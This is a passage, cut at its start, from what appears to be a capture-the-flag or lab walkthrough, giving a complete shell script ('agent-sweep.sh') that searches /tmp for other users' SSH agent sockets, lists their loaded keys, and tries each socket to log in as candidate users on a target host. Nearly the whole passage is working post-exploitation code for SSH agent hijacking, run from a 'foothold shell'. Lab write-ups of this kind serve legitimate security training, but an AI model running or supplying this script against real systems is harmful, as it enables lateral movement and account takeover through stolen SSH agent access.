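    find "${1:-/tmp}" -path '*/ssh-*/agent.*' 2>/dev/null | sort
}

# Ask the agent on a socket for its key list. Returns 0 and prints the
# fingerprints when it answers with at least one key; returns 1 when the
# path is not a socket, is not readable, or holds an agent with no keys.
probe_agent() {
    [ -S "$1" ] || return 1
    SSH_AUTH_SOCK="$1" ssh-add -l 2>/dev/null
}

# Try each user (remaining arguments) through one socket. BatchMode=yes
# turns off password prompts, so a key the server rejects fails at once
# instead of waiting for Enter. Prints "socket user" for every success.
try_users() {
    sock="$1"; shift
    for user in "$@"; do
        if SSH_AUTH_SOCK="$sock" ssh -o BatchMode=yes -o ConnectTimeout=5 \
                -o StrictHostKeyChecking=accept-new "$user@$TARGET" true \
                2>/dev/null; then
            printf '%s %s\n' "$sock" "$user"
        fi
    done
}

# Sweep: report every readable agent and which candidate users it logs in as.
# Arguments: search root, then users (default: candidate_users on /etc/passwd).
sweep() {
    root="$1"; shift
    [ $# -gt 0 ] || set -- $(candidate_users)
    list_agent_sockets "$root" | while IFS= read -r sock; do
        if probe_agent "$sock" >/dev/null; then
            echo "[+] $sock answers; keys loaded:"
            probe_agent "$sock" | sed 's/^/    /'
            try_users "$sock" "$@"
        else
            echo "[-] $sock: not a usable agent (wrong type, no access, or no keys)"
        fi
    done
}

# Usage from the foothold shell:  sh agent-sweep.sh /tmp lea polo pedro
if [ $# -gt 0 ]; then
    sweep "$@"
fi
```

Run it from the polo shell with `/tmp` and the candidate users; every socket that answers `ssh-add -l` is listed with its fingerprints, followed by the users it can log in as, so a single pass replaces the PID-guessing loop and the repeated Enter presses.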